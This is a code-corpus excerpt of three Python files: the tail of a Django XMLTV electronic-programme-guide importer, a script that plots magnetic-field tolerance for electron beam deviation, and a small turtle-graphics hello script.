self.tree.xpath('string(//tv[1]/@generator-info-name)')\n self.xmltv_source.generator_info_url = \\\n self.tree.xpath('string(//tv[1]/@generator-info-url)')\n # save\n self.xmltv_source.save()\n\n def serialize(self, obj):\n # use recursion to iterate\n try:\n [self.serialize(o) for o in obj]\n except TypeError:\n pass\n\n name = obj.__class__.__name__\n # check if there is an opened file descriptor for this kind of obj\n if not name in self.dump_data['file_handlers']:\n self.dump_data['file_handlers'][name] = open(\n '%s/%s.json' % (self.tempdir, name), 'w')\n self.dump_data['object_ids'][name] = []\n if self.already_serialized(obj):\n # already serialized, so skip it\n return\n\n self.dump_data['object_ids'][name].append(obj.id)\n data = serializers.serialize(\"json\", [obj, ], indent=2)\n self.dump_data['file_handlers'][name].write(data)\n\n def already_serialized(self, obj):\n name = obj.__class__.__name__\n try:\n self.dump_data['object_ids'][name].index(obj.id)\n # already serialized\n return 1\n except KeyError:\n return 0\n except ValueError:\n return 0\n\n def count_channel_elements(self):\n return len(self.tree.findall('channel'))\n\n def count_programme_elements(self):\n return len(self.tree.findall('programme'))\n\n def get_number_of_elements(self):\n return self.count_channel_elements() + self.count_programme_elements()\n\n def get_period_of_the_file(self):\n programmes = self.tree.findall('programme')\n starts = map(lambda p: parse(p.get('start')), programmes)\n stops = map(lambda p: parse(p.get('stop')), programmes)\n starts.sort()\n s_start = starts[0]\n stops.sort(reverse=True)\n s_stop = stops[0]\n return s_start.astimezone(timezone('UTC')).replace(tzinfo=utc), \\\n s_stop.astimezone(timezone('UTC')).replace(tzinfo=utc)\n\n def get_xml_info(self):\n tv = self.tree.getroot()\n return {\n 'source_info_url': tv.get('source-info-url'), \\\n 'source_info_name': tv.get('source-info-name'), \\\n 'source_data_url': tv.get('source-data-url'), \\\n 'generator_info_name': tv.get('generator-info-name'), \\\n 'generator_info_url': tv.get('generator-info-url')\n }\n\n #@transaction.commit_on_success\n def _increment_importedElements(self):\n if isinstance(self.epg_source, Epg_Source):\n self.epg_source.importedElements += 1\n self.epg_source.save()\n\n #@transaction.commit_on_success\n def _decrement_importedElements(self):\n if isinstance(self.epg_source, Epg_Source) \\\n and self.epg_source.importedElements > 0:\n self.epg_source.importedElements -= 1\n self.epg_source.save()\n\n def _get_dict_for_langs(self):\n # Search for lang attributes in the xml\n lang_set = set()\n for l in self.tree.findall(\".//*[@lang]\"):\n lang_set.add(l.get('lang')) # Auto exclude dupplicates\n langs = dict()\n for lang in lang_set:\n L, created = Lang.objects.get_or_create(value=lang)\n langs[lang] = L.id\n return langs\n\n def grab_info(self):\n log = logging.getLogger('epg_import')\n log.info('Grabbing meta information')\n\n self.xml.seek(0)\n for event, elem in etree.iterparse(self.xml, tag='tv'):\n self.xmltv_source.generator_info_name = \\\n elem.get('generator-info-name')\n self.xmltv_source.generator_info_url = \\\n elem.get('generator-info-url')\n\n self.xmltv_source.save()\n\n #@transaction.commit_on_success\n def import_channel_elements(self):\n log = logging.getLogger('epg_import')\n log.info('Importing Channel elements')\n self.xml.seek(0)\n #for ev, elem in etree.iterparse(self.xml.name, tag='channel'):\n for elem in self.tree.xpath('channel'):\n\n C, created = Channel.objects.get_or_create(\n channelid=elem.get('id'))\n\n for child in elem.iterchildren():\n if child.tag == 'display-name':\n L, created = Lang.objects.get_or_create(\n value=child.get('lang'))\n D, created = Display_Name.objects.get_or_create(\n value=child.text or '', lang=L)\n C.display_names.add(D)\n self.serialize(D)\n elif child.tag == 'icon':\n I, created = Icon.objects.get_or_create(\n src=child.get('src'))\n C.icons.add(I)\n self.serialize(I)\n elif child.tag == 'url':\n U, created = Url.objects.get_or_create(value=child.text)\n C.urls.add(U)\n self.serialize(U)\n\n #self.serialize(C)\n\n elem.clear()\n # Also eliminate now-empty references from the root node to \n while elem.getprevious() is not None:\n del elem.getparent()[0]\n\n #@profile(\"programme.prof\")\n @transaction.commit_manually\n def import_programme_elements(self, limit=0):\n log = logging.getLogger('epg_import')\n log.debug('Importing Programme elements:%s', self.xml.name)\n # Get channels from db\n channels = dict()\n for c in Channel.objects.values_list('channelid', 'pk'):\n channels[c[0]] = c[1]\n import_start = datetime.now()\n import_ant = datetime.now()\n nant = 0\n imported = 0\n\n self.xml.seek(0)\n try:\n #for event, elem in etree.iterparse(self.xml, tag='programme'):\n for elem in self.tree.xpath('programme'):\n if elem.find('date') is not None:\n date = elem.find('date').text\n else:\n date = None\n\n programid = elem.get('program_id')\n #log.info('program_id=%s', programid)\n P, c = Programme.objects.get_or_create(programid=programid)\n P.date = date\n P.save()\n # log.info('finish=%s', programid)\n\n # Get time and convert it to UTC\n start = parse(elem.get('start')).astimezone(\n timezone('UTC')).replace(tzinfo=utc)\n stop = parse(elem.get('stop')).astimezone(\n timezone('UTC')).replace(tzinfo=utc)\n # Insert guide\n channel_id = channels[elem.get('channel')]\n G, created = Guide.objects.get_or_create(\n start=start, stop=stop,\n channel_id=channel_id, programme=P)\n for child in elem.iterchildren():\n if child.tag == 'desc':\n if child.get('lang'):\n L, created = Lang.objects.get_or_create(\n value=child.get('lang'))\n else:\n L = None\n if type(child.text) is NoneType:\n continue\n desc = child.text.replace(\n ' - www.revistaeletronica.com.br ', '')\n obj, created = Description.objects.get_or_create(\n value=desc, lang=L)\n P.descriptions.add(obj)\n elif child.tag == 'title':\n L, created = Lang.objects.get_or_create(\n value=child.get('lang'))\n obj, created = Title.objects.get_or_create(\n value=child.text, lang=L)\n P.titles.add(obj)\n elif child.tag == 'sub-title':\n L, created = Lang.objects.get_or_create(\n value=child.get('lang'))\n obj, created = Title.objects.get_or_create(\n value=child.text, lang=L)\n P.secondary_titles.add(obj)\n elif child.tag == 'category':\n L, created = Lang.objects.get_or_create(\n value=child.get('lang'))\n obj, created = Category.objects.get_or_create(\n value=child.text, lang=L)\n P.categories.add(obj)\n elif child.tag == 'video':\n for grand_child in child.iterchildren():\n if grand_child.tag == 'colour':\n P.video_colour = grand_child.text\n elif grand_child.tag == 'present':\n P.video_present = grand_child.text\n elif grand_child.tag == 'aspect':\n P.video_aspect = grand_child.text\n elif grand_child.tag == 'quality':\n P.video_quality = grand_child.text\n elif child.tag == 'audio':\n for grand_child in child.iterchildren():\n if grand_child.tag == 'present':\n P.audio_present = grand_child.text\n elif grand_child.tag == 'stereo':\n P.audio_stereo = grand_child.text\n elif child.tag == 'country':\n obj, created = Country.objects.get_or_create(\n value=child.text)\n P.country = obj\n elif child.tag == 'rating':\n sys='default'\n val='default'\n if child.get('system') != None:\n sys = child.get('system')\n if child.find('value').text != None:\n val = child.find('value').text\n obj, created = Rating.objects.get_or_create(\n system=sys,\n value=val)\n P.rating = obj\n elif child.tag == 'star-rating':\n obj, created = Star_Rating.objects.get_or_create(\n value=child.find('value').text,\n system=child.get('system'))\n for i in child.iterfind('icon'):\n I, created = Icon.objects.get_or_create(\n src=i.get('src'))\n obj.icons.add(I)\n P.star_ratings.add(obj)\n elif child.tag == 'language':\n L, created = Lang.objects.get_or_create(\n value=child.get('lang'))\n obj, created = Language.objects.get_or_create(\n value=child.text, lang=L)\n P.language = obj\n elif child.tag == 'original_language':\n L, created = Lang.objects.get_or_create(\n value=child.get('lang'))\n obj, created = Language.objects.get_or_create(\n value=child.text, lang=L)\n P.original_language = obj\n elif child.tag == 'subtitles':\n obj = set()\n for sub in child.iterchildren('language'):\n lang, created = Lang.objects.get_or_create(\n value=child.get('lang'))\n L, created = Language.objects.get_or_create(\n value=sub.text, lang=lang)\n S, created = Subtitle.objects.get_or_create(\n language=L, subtitle_type=sub.get('type'))\n P.subtitles.add(S)\n obj.add((L, S))\n elif child.tag == 'length':\n units = child.get('units')\n if units == 'seconds':\n P.length = int(child.text)\n elif units == 'minutes':\n P.length = int(child.text) * 60\n elif units == 'hours':\n P.length = int(child.text) * 3600\n elif child.tag == 'credits':\n for grand_child in child.iterchildren():\n if grand_child.tag == 'actor':\n obj, created = Actor.objects.get_or_create(\n name=grand_child.text,\n role=grand_child.get('role'))\n P.actors.add(obj)\n elif grand_child.tag == 'director':\n obj, created = Staff.objects.get_or_create(\n name=grand_child.text)\n P.directors.add(obj)\n elif grand_child.tag == 'writer':\n obj, created = Staff.objects.get_or_create(\n name=grand_child.text)\n P.writers.add(obj)\n elif grand_child.tag == 'adapter':\n obj, created = Staff.objects.get_or_create(\n name=grand_child.text)\n P.adapters.add(obj)\n elif grand_child.tag == 'producer':\n obj, created = Staff.objects.get_or_create(\n name=grand_child.text)\n P.producers.add(obj)\n elif grand_child.tag == 'composer':\n obj, created = Staff.objects.get_or_create(\n name=grand_child.text)\n P.composers.add(obj)\n elif grand_child.tag == 'editor':\n obj, created = Staff.objects.get_or_create(\n name=grand_child.text)\n P.editors.add(obj)\n elif grand_child.tag == 'presenter':\n obj, created = Staff.objects.get_or_create(\n name=grand_child.text)\n P.presenters.add(obj)\n elif grand_child.tag == 'commentator':\n obj, created = Staff.objects.get_or_create(\n name=grand_child.text)\n P.commentators.add(obj)\n elif grand_child.tag == 'guest':\n obj, created = Staff.objects.get_or_create(\n name=grand_child.text)\n P.guests.add(obj)\n\n P.save()\n\n #self.serialize(P)\n\n elem.clear()\n # Also eliminate now-empty references\n # from the root node to <Title>\n while elem.getprevious() is not None:\n del elem.getparent()[0]\n\n imported += 1\n if imported % 100 == 0:\n nant = imported - nant\n #db.transaction.autocommit()\n db.transaction.commit()\n db.reset_queries()\n delta = datetime.now() - import_ant\n vel = nant / delta.total_seconds()\n percent = (imported / self.total_programme) * 100\n log.info('Imported %d/%d (%.2g) vel=%d i/s', imported,\n self.total_programme, percent, vel)\n nant = imported\n import_ant = datetime.now()\n if limit > 0 and imported >= limit:\n break\n except Exception as e:\n log.error('Error:%s', e)\n db.transaction.commit()\n db.reset_queries()\n\n #@transaction.commit_on_success\n def import_to_db(self):\n log = logging.getLogger('epg_import')\n zip = zipfile.ZipFile(\n '%s/%dfull.zip' % (os.path.join(settings.MEDIA_ROOT, 'epg'),\n self.xmltv_source.pk), \"w\", zipfile.ZIP_DEFLATED)\n\n # create temp dir\n self.tempdir = tempfile.mkdtemp()\n\n # init dict with file handlers and\n self.dump_data = {'file_handlers': {}, 'object_ids': {}}\n\n #self.grab_info()\n\n #epg_source = self.xmltv_source.epg_source_ptr\n\n # Import <channel> elements\n self.import_channel_elements()\n # Import <programme> elements\n self.import_programme_elements(limit=0)\n # count elements\n #epg_source.numberofElements = \\\n # Programme.objects.filter(source=epg_source).count() + \\\n # Channel.objects.filter(source=epg_source).count()\n # Update importedElements\n #epg_source.importedElements = self.xmltv_source.numberofElements\n # save changes\n #epg_source.save()\n #self.xmltv_source.save()\n\n #self.serialize(epg_source)\n\n for k, v in self.dump_data['file_handlers'].items():\n log.info('Writing %d %s objects' % (\n len(self.dump_data['object_ids'][k]), k))\n v.flush()\n v.close()\n\n file = open(v.name, 'r+')\n\n # edit file\n data = file.read()\n output = re.sub(r'^\\]\\[$', r',', data, flags=re.MULTILINE)\n file.seek(0)\n file.truncate(0)\n file.write(output)\n file.flush()\n\n zip.write(file.name, os.path.basename(file.name))\n file.close()\n zip.close()\n # remove temp dir\n shutil.rmtree(self.tempdir)\n ## Rebuild linked list\n sql_linked_list = \"update epg_guide g set \\\nprevious_id = (\\\nselect o.id from epg_guide o where o.start < g.start AND \\\no.channel_id = g.channel_id order by o.start desc limit 1\\\n),\\\nnext_id = (\\\nselect o.id from epg_guide o where o.start > g.start AND \\\no.channel_id = g.channel_id order by o.start asc limit 1\\\n);\\\n\"\n #from django.db import connection\n #cursor = connection.cursor()\n #cursor.execute(sql_linked_list)\n\n\ndef get_info_from_epg_source(epg_source):\n\n # Update Epg_Source fields\n numberofElements = 0\n file_list = Zip_to_XML(epg_source.filefield.path)\n for f in file_list.get_all_files():\n importer = XML_Epg_Importer(f, epg_source_instance=epg_source)\n numberofElements += importer.get_number_of_elements()\n # Retrive maximum stop time and minimum start time\n if (epg_source.minor_start != None) and (epg_source.major_stop != None):\n minor_start, major_stop = importer.get_period_of_the_file()\n if (epg_source.minor_start > minor_start):\n epg_source.minor_start = minor_start\n if (epg_source.major_stop < major_stop):\n epg_source.major_stop = major_stop\n else:\n epg_source.minor_start, epg_source.major_stop = \\\n importer.get_period_of_the_file()\n\n # Update Epg_Source fields\n epg_source.numberofElements = numberofElements\n epg_source.importedElements = 0\n info = importer.get_xml_info()\n epg_source.source_info_url = info['source_info_url']\n epg_source.source_info_name = info['source_info_name']\n epg_source.source_data_url = info['source_data_url']\n epg_source.generator_info_name = info['generator_info_name']\n epg_source.generator_info_url = info['generator_info_url']\n\n epg_source.save()\n\n\ndef diff_epg_dumps(input1, input2):\n \"diff 2 zip files containing json object dumps\"\n # create tempdir and output zip file\n tempdir = tempfile.mkdtemp()\n zip = zipfile.ZipFile('%sdiff.zip' % input2[:-8],\n \"w\", zipfile.ZIP_DEFLATED)\n # open input zip files\n z1 = zipfile.ZipFile(input1, 'r')\n z2 = zipfile.ZipFile(input2, 'r')\n\n p = re.compile(r'^,$', re.MULTILINE)\n for file in z2.namelist():\n f2 = z2.open(file)\n try:\n f1 = z1.open(file)\n except KeyError:\n zip.writestr(file, f2.read())\n f2.close()\n continue\n lines1 = f1.read()\n lines2 = f2.read()\n set1 = set(filter(None, p.split(lines1[1:-2])))\n set2 = set(filter(None, p.split(lines2[1:-2])))\n diff = list(set2 - set1)\n out = open(os.path.join(tempdir, f2.name), 'w')\n out.write('[')\n out.writelines(','.join(diff))\n out.write(']\\n')\n out.close()\n f1.close()\n f2.close()\n zip.write(out.name, os.path.basename(out.name))\n # cleanups\n zip.close()\n shutil.rmtree(tempdir)\n","sub_path":"epg/data_importer.py","file_name":"data_importer.py","file_ext":"py","file_size_in_byte":25463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"268745826","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef tol_b(dis, dev, energy):\n \"\"\"\n Calculate tolerance of magnetic field for desired deviation requirement.\n :param dis: distance from condenser optics to APS entrance.\n :param dev: required deviation of electron traces at APS entrance.\n :param energy: electron energy at eV at entrance.\n :return: b tolerance in Gauss\n \"\"\"\n m = 9.1e-31\n c = 1.6e-19\n v = (2 * energy * c / m) ** 0.5\n b_tol = []\n for j in dis:\n deflect_radius = (j ** 2) / (2 * dev)\n result = (m * v * 1e4) / (c * deflect_radius)\n b_tol.append(result)\n return b_tol\n\n\ndef main():\n e_energy = 5000\n dis = np.arange(1e-4, 1e-3, 1e-5)\n dev = [1e-7, 2e-7, 3e-7, 5e-7, 8e-7, 1e-6]\n b_tol = {}\n for i in dev:\n b_tol['i'] = tol_b(dis, i, e_energy)\n plt.plot(dis, b_tol['i'])\n plt.xlabel('dist_gun_to_aps (m)')\n plt.ylabel('b_tolerance (gauss)')\n plt.title('b_tolerance_with_required_deviation_at_aps_entrance')\n plt.text(4e-4, 300, 'Up to bot: more strict dev requirement')\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Day16-20/code/par_deflect.py","file_name":"par_deflect.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"107428574","text":"# hello.py\n\nfrom sys import *\nfrom Tkinter import HIDDEN, NORMAL, Tk, Canvas\nimport turtle\nimport mod.data as me\n\n\nprint(version_info)\nme.hello()\na = me.info(\"JAeHO\")\na.hello()\n\nroot = Tk()\nc = Canvas(root, width=500, height = 400)\nc.configure(bg='dark green', highlightthickness=0)\nc.pack()\n\n\npainter = turtle.RawTurtle(c)\npainter.pencolor(\"blue\")\nfor i in range(10):\n painter.forward(10)\n painter.left(123) # Let's go counterclockwise this time \n \npainter.pencolor(\"red\")\nfor i in range(10):\n painter.forward(100)\n painter.left(123)\n\nroot.mainloop()\n\n\n","sub_path":"numpy/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}